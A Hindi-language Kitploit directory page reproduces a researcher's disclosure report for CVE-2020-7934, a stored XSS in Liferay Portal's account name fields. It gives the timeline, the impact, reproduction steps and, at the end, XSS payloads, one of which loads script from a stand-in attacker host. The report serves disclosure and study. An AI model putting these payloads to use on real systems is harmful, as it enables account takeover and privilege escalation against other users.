Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934 — प्रमाणित Stored XSS LifeRay 7.2.0 GA1 में MyAccountPortlet के माध्यम से Search Results द्वारा निष्पादित | Kitploit
उपकरण/GitHubGitHub/3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHub3ndg4me/liferay-xss-7.2.1ga2-poc-report-cve-2020-7934

liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934

प्रमाणित Stored XSS LifeRay 7.2.0 GA1 में MyAccountPortlet के माध्यम से Search Results द्वारा निष्पादित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6135 साल पहलेअभी तक समीक्षित नहीं

LifeRay 7.2.1 GA2 में MyAccountPortlet द्वारा खोज परिणामों में निष्पादित प्रमाणित संग्रहीत XSS

LifeRay संस्करण 7.1.0 से 7.2.1 GA2 में उपयोगकर्ता खातों के लिए प्रथम नाम, मध्य नाम और अंतिम नाम फ़ील्ड एक संग्रहीत XSS समस्या के लिए कमजोर हैं। कोई भी उपयोगकर्ता इन फ़ील्ड को एक विशेष XSS पेलोड के साथ संशोधित कर सकता है और यह डेटाबेस में संग्रहीत हो जाएगा, उपयोगकर्ता को "संक्रमित" कर देगा। फिर यह पेलोड तब प्रस्तुत होगा जब कोई उपयोगकर्ता अन्य उपयोगकर्ताओं को खोजने के लिए खोज सुविधा का उपयोग करता है। यदि संक्रमित उपयोगकर्ता को खोज परिणाम के रूप में प्रदर्शित किया जाता है, तो XSS पेलोड निष्पादित हो जाएगा।

  • लेखक/शोधकर्ता: केसी एर्डमैन
  • खोज की तिथि: 10/17/2019
  • अंतिम संशोधन: 10/05/2020
  • निजी प्रकटीकरण: 10/18/2019
  • सार्वजनिक प्रकटीकरण: 01/27/2020 (ब्लॉग पोस्ट)
  • निश्चित रिलीज: 01/30/2020 Liferay Portal 7.3.0 GA1
  • प्रूफ ऑफ कॉन्सेप्ट रिलीज: 10/05/2020

प्रभाव

यह कमजोरी एक हमलावर को किसी भी उपयोगकर्ता के संदर्भ में मनमाना कोड निष्पादित करने की अनुमति देती है जो खोज के माध्यम से XSS पेलोड को ट्रिगर करता है। व्यावहारिक रूप में, इससे एक गैर-विशेषाधिकार प्राप्त उपयोगकर्ता से प्रशासनिक उपयोगकर्ता तक विशेषाधिकार वृद्धि के साथ-साथ अन्य खातों को अपने कब्जे में लेने में पार्श्व गति हो सकती है। इसके अलावा, जो कुछ भी जावास्क्रिप्ट के माध्यम से निष्पादित किया जा सकता है, उसका दूसरे उपयोगकर्ता के संदर्भ में शोषण किया जा सकता है।

जैसा कि आप प्रूफ ऑफ कॉन्सेप्ट (PoC) में देखेंगे, यह पूरी तरह से खुला है क्योंकि हमलावर के पास डिफ़ॉल्ट संदर्भ में आसानी से बाहरी स्क्रिप्ट लोड करने की क्षमता है।

अधिकांश महत्वपूर्ण सत्र कुकीज़ को HTTPOnly के रूप में चिह्नित किया जाता है, जो सामान्य सत्र अपहरण तकनीकों को ज्यादातर रोकता है। हालांकि, यह ध्यान दिया जाना चाहिए कि पुराने ब्राउज़रों वाले उपयोगकर्ता XST हमलों के कारण इससे और भी अधिक प्रभावित होते हैं।

चूंकि एडमिन उपयोगकर्ता गोगो शेल और ग्रूवी स्क्रिप्ट कमांड निष्पादित कर सकते हैं, इसलिए इस शोषण को इन सामान्य रूप से अभिप्रेत सुविधाओं के साथ जोड़कर गैर-विशेषाधिकार प्राप्त उपयोगकर्ता से होस्ट सिस्टम पर अनावश्यक RCE प्राप्त करना भी संभव हो सकता है।

पुनरुत्पादन के चरण

इस कमजोरी को ट्रिगर करने के लिए दो शर्तें पूरी होनी चाहिए:

  1. आपके पास एक उपयोगकर्ता खाते तक पहुंच होनी चाहिए जिस पर आप प्रथम, मध्य या अंतिम नाम फ़ील्ड को संशोधित कर सकें।
  2. आपका उपयोगकर्ता LifeRay में खोजने योग्य होना चाहिए। आमतौर पर इसका मतलब है कि उन्हें किसी साइट में जोड़ा जाना चाहिए। डिफ़ॉल्ट रूप से एक उपयोगकर्ता स्वयं को आधार साइट में जोड़ सकता है, जिसका अर्थ है कि वे बिना किसी अतिरिक्त प्राधिकरण के स्वयं को खोजने योग्य बना सकते हैं।

एक बार ये शर्तें पूरी हो जाने पर, कमजोरी का शोषण करने के लिए निम्नलिखित चरणों का पालन किया जा सकता है:

  1. उस उपयोगकर्ता के रूप में लॉगिन करें जिसकी पहुंच आपके पास है
  2. खाता सेटिंग अनुभाग पर नेविगेट करें
    • प्रोफ़ाइल आइकन > खाता सेटिंग पर क्लिक करें
    • URL कुछ इस प्रकार होना चाहिए: http://mysite.com/user/hacker/manage?p_p_id=com_liferay_my_account_web_portlet_MyAccountPortlet&p_p_lifecycle=0&p_p_auth=??????
  3. फ़ॉर्म में प्रथम, मध्य या अंतिम नाम फ़ील्ड को अपने XSS पेलोड के साथ संशोधित करें (नीचे उदाहरण PoCs देखें) और सहेजें पर क्लिक करें
  4. यदि आप पहले से किसी साइट में नहीं हैं, तो आप http://mysite.com/user/hacker/home/-/my_sites/sites/available-sites?_com_liferay_site_my_sites_web_portlet_MySitesPortlet_displayStyle=descriptive पर नेविगेट करके और दाईं ओर "तीन बिंदु" आइकन पर क्लिक करके शामिल हों का चयन करके एक साइट में शामिल हो सकते हैं।
  5. अपने उपयोगकर्ता को ट्रिगर करने के लिए खोजें: http://mysite.com/web/guest/search?q=<मेरा उपयोगकर्ता>
    • किसी अन्य उपयोगकर्ता पर प्रभाव प्रदर्शित करने के लिए परीक्षण के लिए:
      • दूसरे उपयोगकर्ता के रूप में साइन इन करें, "संक्रमित उपयोगकर्ता" की खोज करें और XSS पेलोड उनके संदर्भ में भी निष्पादित होगा।

PoC सरल अलर्ट

  • <<SCRIPT>alert("XSS");//<</SCRIPT>

PoC बाहरी स्क्रिप्ट और फ़िल्टर बाईपास

  • <SCRIPT SRC="//attacker.site/payload.js">
  • xss.rocks के साथ डेमो करने का प्रयास करें!
    • <SCRIPT SRC="//xss.rocks/xss.js"/>

रिपोर्ट संस्करण 4.0

टूल डाउनलोड करें